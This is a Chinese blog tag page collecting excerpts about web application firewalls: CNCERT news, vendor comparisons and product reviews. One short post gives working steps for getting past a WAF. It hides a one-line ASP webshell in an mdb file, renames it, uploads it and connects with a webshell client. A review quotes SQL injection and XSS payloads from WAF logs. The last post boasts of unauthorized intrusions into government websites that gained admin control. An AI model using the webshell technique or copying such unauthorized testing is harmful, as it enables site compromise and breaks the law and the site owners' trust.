标签： 应用防火墙

　　新华网北京3月13日电 （记者 周文林）由工业和信息化部通信保障局和国家互联网应急中心（CNCERT）共同主办的“2010年互联网网络安全态势报告发布会”近日在京召开。此次大会发布的报告显示，2010年我国基础网络运行总体平稳，但同时也存在诸多问题，包括政府网站安全防护薄弱，工业控制系统安全面临严峻挑战，木马和僵尸网络依然对网络安全构成直接威胁等。报告认为，我国互联网应用层服务的市场监管和用户隐私保护工作亟待加强。

　　此次发布的报告显示，2010年我国基础网络运行总体平稳，互联网骨干网各项检测指标正常。但不容忽视的是，域名系统安全仍是薄弱环节。2010年1月12日，百度网站发生了4小时的访问故障，引起网民广泛关注。9月10日，安徽电信公共域名服务器遭受网络攻击，省内互联网用户上网受到影响。此外，去年还发生多次针对新网、万网等域名注册服务机构的网络攻击事件。
...

　　几个月以前我决定去探查一下Web应用层防火墙(WAF)是否真正有用，或者它仅仅是一个花费巨大的披着华丽外衣的废物，只是使得审计人员用来逃脱职责。

　　当然，WAF的卖家总是一成不变的告诉我们他们的产品是如何如何的好，有多少多少的客户在使用他们的产品，但是，这不是最好的方式来了解真实的情况。我也在与一些最终用户的谈论中获知了一些真实的情况，甚至这种方式也不是一个发现安全工具价值的最好方式。并不是所有的使用者有很好的观察法和内部控制方式去测试这些工具的效用，而且由于一些政治和技术方面的原因，很多人并不能够以最优的方式去部署这些工具。
...

　　Web安全问题的技术根源和攻击方法的演进在全球范围内是一样的，所以不管在国内还是国外，WEB应用防火墙（WAF）必定会成为主流的Web应用安全解决方案。

　　不过，有些用户一度认为另外一个产品就是WEB应用防火墙，它就是网页防篡改系统。网页篡改始终是令国内网站头疼的Web安全问题。而且，此类攻击的数量还在呈现上升的趋势。政府门户网站、高校、企业、运营商的网站都出现过严重的网页篡改事件。因此，网页防篡改系统迅速流行起来。

　　网页防篡改系统是一种软件解决方案，它的防护效果直接，但是它的部署位置和基本原理决定了，它只能保护静态页面，而无法保护动态页面。梭子鱼公司中国总经理何平表示，为了解决这个问题，有些网页防篡改系统供应商提出在Web服务器上再安装诸如“SQL注入防护模块”的方案，但这会影响Web服务器性能，而且对动态页面的篡改方法远远不只是“SQL注入”，这种打补丁的方案从长远来看是不行的。
...

现在有不少服务器加了web的防火墙，用来过滤含asp/jsp/php的网马代码，全部用空格替换，
比较讨厌，不过后来刚好想到以前的一句话时候的unicode编码，那就也搞一个吧。

1.新建一个mdb
2.建表，考入：┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
　（实际是<% execute request("a")%>）
3.改后缀为asp/asa
4.上传
5.一句话客户端或者菜刀连接

FROM http://hi.baidu.com/it_security/blog/item/976f6ddbbce719d5b6fd4882.html...

　　游侠朋友公司的WAF刚升级了，在面前显摆呢，嘿嘿。截几个图让大家看看。
　　下面是可以设置高速缓存，提高网站访问速度。设置一个值，这样客户端请求部分无需频繁更新的文件的时候就可以由WAF直接返回，增加了访问速度还减轻了WEB服务器的压力。

　　当然，数据压缩也是必须的，这样访问速度更快了。

　　长期以来，很多单位和部门的网站深受木马毒害，并时常遭到黑客的无情篡改，由于网站是对外传播的第一门面，因此，网站安全始终是悬在网络中心管理员头上的一把利剑!

　　难道网站安全真的就不能让人放心无忧吗?

　　当然可以!

　　日前，国内领先的网络设备及解决方案提供商锐捷网络推出了门户网站安全守护神——RG-WG系列锐捷webGuard应用保护系统，弥补了传统网站安全防护机制漏洞，把

　　随着互联网的发展演变，基于Web和数据库架构的应用系统已经逐渐成为主流，广泛应用于企业内部和外部的业务系统中。但是，黑客也将攻击目标瞄准了Web应用，目前常见的网络攻击大多数都是针对应用自身的弱点，其中最常用的攻击技术就是针对Web应用的SQL注入和跨站攻击。

　　对Web应用的攻击增多刺激了Web应用防火墙（以下简称WAF）市场的增长。WAF是一种专门针对Web应用进行全面防护的设备，它可以识别黑客攻击，并且根据应用层的会话请求，处理应用层信息。也就是说，它专门保护Web应用通信流和所有相关的应用资源，避免遭受来自Web协议或应用程序漏洞方面的攻击。根据IDC的报告，未来几年全球关于Web应用防护的市场份额将达30亿美元。
...

　　中新社北京5月18日电 来自国家互联网应急中心18日的报告显示，5月10日至5月16日一周内，中国境内有81个政府网站被篡改，这一数据环比下降了35%。

　　根据监测，至5月17日12时，仍有29个被篡改的政府网站没有恢复，其中包括4个省部级网站，分别位于安徽、江苏、四川和西藏自治区，另外还有25个地市级政府网站。

　　这些数据显示，政府网站的安全意识和安全措施有待加强。不过，政府网站被篡改的数量呈降低趋势。5月2日至5月9日一周，中国124家政府网站被篡改。

　　根据监测，针对政府、企业以及互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播活动以及网页篡改。
...

　　从2008年开始，大量企业、政府的网站遭遇Web攻击，甚至有黑客通过攻击企业网站勒索钱财。众多的事例使企业逐渐认识到，由于很多攻击已经转向应用层，传统的防火墙、IPS、网页防篡改设备都无法彻底阻止此类攻击，必须要安装Web应用防火墙（以下简称WAF）来保护Web应用。

　　保护应用的“墙”

　　只要有网络的地方就会有防火墙，但传统的防火墙只是针对一些底层（网络层、传输层）的信息进行阻断，而WAF则深入到应用层，对所有应用信息进行过滤，这是二者的本质区别。

　　WAF的运行基础是应用层访问控制列表。整个应用层的访问控制列表所面对的对象是网站的地址、网站的参数、在整个网站互动过程中所提交的一些内容，包括HTTP协议报文内容，由于WAF对HTTP协议完全认知，通过内容分析就可知道报文是恶意攻击还是非恶意攻击。IPS只是做部分的扫描，而WAF会做完全、深层次的扫描。
...

　　摘要：
　　
　　IPS（入侵防护系统）和WAF（Web应用防护系统）两款产品有不同的使用场景，随着Web应用发展带来的复杂度，对安全性要求也日趋增高，Waf的出现是顺应了市场和技术的需要，本文从对比角度来分析，是为了从差异中让读者更清晰的理解Web安全防护产品的技术特征。
　　
　　关键词：WAF IPS WEB应用防护 绿盟科技
　　
　　谁是最佳选择？
　　
　　Web应用防护无疑是一个热门话题。由于技术的发展成熟和人们对便利性的期望越来越高，Web应用成为主流的业务系统载体。在Web上“安家”的关键业务系统中蕴藏的数据价值引起攻击者的青睐，网上流传的Web漏洞挖掘和攻击工具让攻击的门槛降低，也使得很多攻击带有盲目和随机性。比如利用GoogleHacking原理的批量查找具有已知漏洞的应用程序，还有SQL批量注入和挂马等。但对于重要的Web应用（比如运营商或金融），始终有受利益驱动的黑客进行持续的跟踪。
...

中国WEB应用防火墙厂商与产品大全
排名依据根据“厂家名称”的首字母拼音，无特殊含义。
更新日期：2010年03月23日
发布网站：www.cnciso.com、www.youxia.org
联系人QQ：55984512、55984512

　　一。前言
　　Web应用平台的应用范围有哪些？
　　随着计算及业务逐渐向数据中心高度集中发展，Web业务平台已经在各类政府、企业机构的核心业务区域，如电子政务、电子商务、运营商的增值业务等中得到广泛应用，很多企业都将应用架设在Web平台上，Web成为一种普适平台。
　　
　　Web应用带来的威胁有什么？
　　Web业务的迅速发展也引起了黑客们的强烈关注，他们将注意力从以往对传统网络服务器的攻击逐步转移到了对 Web 业务的攻击上。黑客利用网站操作系统的漏洞和Web程序的SQL注入漏洞等得到Web服务器的控制权限，轻则篡改网页内容，重则窃取重要内部数据，更为严重的则是在网页中植入恶意代码，使得网站访问者受到侵害。
...

　　前几天也给大家说过WEB应用防火墙，包括软件的和硬件的，今天游侠（https://www.youxia.org）再给大家推荐个产品，当然这个是二合一的，就是：网页防篡改+WEB应用防火墙。比较有特色，好了，废话不说，正文开始：
　　安装就跳过了，相信对本文感兴趣的人都可以按照说明书配置。下面只说一些功能。
　　产品本身有配置向导，可以让一个新手也可以在1分钟之内轻松的完成网站的默认防护，当然如果要求比较高，可以定制策略，下图就是对网站文件进行防护的一个设置：

　　可以看到，可以对文件操作权限进行设置，包括读取、写入、改名、删除等，禁止删除、改名、写入，实际上就实现了网页的防篡改功能。如果是目录的禁止写入，则彻底无法改变网站的任何内容了，适合于需求较高的政府网站。
　　当然，可以对某些文件类型设置信任，如.mdb不禁止写入，这样动态网站就可以正常更新。
　　可以设置信任进程，对通过信任进程进行的操作进行放行，否则阻断。举个简单的例子：可以通过FlashFXP覆盖，但是无法通过LeapFTP覆盖，这样黑客不知道信任进程，就无法随便进行篡改了。
　　
　　当然，作为一款合格的网站防护产品，备份功能也是必须的。比如：开机备份、备份加密等。
　　上面是对网页防篡改功能进行的介绍，下面介绍网站防护功能，要知道，多数网站被黑是由于自身存在漏洞导致的，那么网站防护功能可以较好的防范自身存在的漏洞，如常见的SQL注入、跨站脚本攻击等。
　　我下面配置了一个策略，名称是“www.youxia.org”

　　可以配置策略的响应方式：记录且阻止、仅记录、停止。
　　下面是策略的详细内容：

　　当然，还可以对每个子项进行详细的规则设置，这个就不挨个说了。像跨站脚本、SQL注入等均可设置，亦可设置网站访问的黑白名单。
　　下面我分别提交2个语句，一个是注入，一个是跨站，看网站防护系统的阻断功能：

　　可以看到均被阻断，并且给出了错误提示。当然，管理员也会看到这个报警提示，登录后台可以看到提示：

　　我尝试改变编码和攻击的形式，也均被阻断，防范效果良好。
　　相对于单纯的网页防篡改保护系统，本软件提供了抗攻击功能，这样能阻断黑客与服务器之外。
　　相对于单纯的WEB应用防火墙软件，本软件提供了防篡改功能，这样即使被入侵也无法篡改网站。
　　网路游侠（https://www.youxia.org）推荐采用网页防篡改+WEB应用防护于一体的安全防护软件保护网站安全。

作者：张百川（网路游侠）
网站：https://www.youxia.org
　　　转载请注明来源！谢谢合作。

　　去年的这个时候，游侠(www.youxia.org)认为WAF都是硬件的，后来在网上看到这个在国内做的不错的牌子。居然是软件的WAF，这样的话，一些服务器在机房托管的用户就特别需要这样的产品，因为1U的设备在电信机房的托管费用都有几千到上万，价格和便捷性的优势一下子就出来了……
　　拿到了厂家发过来的测试版，迫不及待的装上试试！
　　测试环境：
　　·Windows Server 2003
　　·IIS 6.0
　　·某有漏洞的ASP内容管理系统
　　这款软件的WAF部署实际上比较简单的，并且是纯绿色软件……不需要下一步，也不需要点安装协议，直接拷贝文件到某个目录下面，配置权限，在IIS或其它的WEB Server进行相关配置即可，不难，几分钟即可配置好。过程我就不说了，只谈感想。呵呵
　　可能不大懂WEB Server配置的人看到软件的说明书会感觉有点头大，因为里面写的都是配置文件以及配置说明，不过就像很多人喜欢开源的产品，这样的产品配置太自由了……任何过滤规则都可以自定义！充分体现了便捷性和功能强大多数时候不成正比的道理。
　　由于产品基本都是配置文件，我下面贴上几条报警规则，大家看看：

2009-09-11 10:56:49 critical 192.168.1.120 GET /ArticleShow.asp 192.168.1.121 80 11103 'SQL Injection Attack - 1' ARGS:ArticleID=95%20and%201=2
2009-09-11 10:57:21 critical 192.168.1.120 GET /ArticleShow.asp 192.168.1.121 80 12101 'Cross-site Scripting (XSS) Attack' ARGS:ArticleID=95<script>alert("youxia")</script>


　　报警日期、时间、远程IP、类型、提交路径、攻击类型、提交参数。还是比较详细的。可以看到把我提交的2个语句都给很明确的记录下来了。
　　本软件WAF默认攻击语句提交后转到网站首页，对攻击者不会有任何错误提示，并且默认禁止了.mdb等的下载。当然，如果你有别的类型，也可以自己在配置文件里面增加。
　　本款软件WAF通过IIS（或其它WEB Server）程序映射方式实现安全防护，没有进程，对系统资源占用较小，对系统资源极度敏感的用户应该很合适用这款软件，另外如果服务器在电信机房托管，选择软件的WAF也相当合适。
　　建议厂家增加GUI，这样看网站的报警日志的时候就轻松多了。

作者：张百川（网路游侠）
网站：https://www.youxia.org
　　　转载请注明来源！谢谢合作。

标题写的挺迷惑人 嘿嘿 有时间就“友情测试”下吧
不过自己有自己的原则：
1、绝不卖shell
2、绝不篡改网页
3、尽量帮助管理员

最近一段时间在忙着做公司的整体网站解决方案
于是每晚上没事的时间也会找个网站看看安全性
当然——未授权的安全检测。呵呵
今天给全省各地市的客户经理培训的时候某客户经理说渗透测试的效率如何？
说实话，自己也很久不做渗透了，不过想捡起来也不算慢

某市信息港……安全性挺烂
其实能得到后台的最高权限就不想继续了
因为作为一个政府运营的网站，能删除所有信息、能篡改首页，够了……
足够撤销负责人的职务了吧？——如果发生在敏感时期的话。
网站头条是某市政府发的通知，不需要改成什么了吧？呵呵
回头写个网站的评估方案给他们看看

实际上，防止黑客攻击有时候并不难，举手之劳而已
但是依然很多网站没有做……

回想到昨天西安附近某政府网站的负责人联系我
说想给网站做整体安全评估
10分钟之内，给了个他网站服务器内部文件的截图……
实际上技术含量也没多高
但是网站就像一个木桶
决定能盛水多少的不在于最高的木板，而在于最低的那一块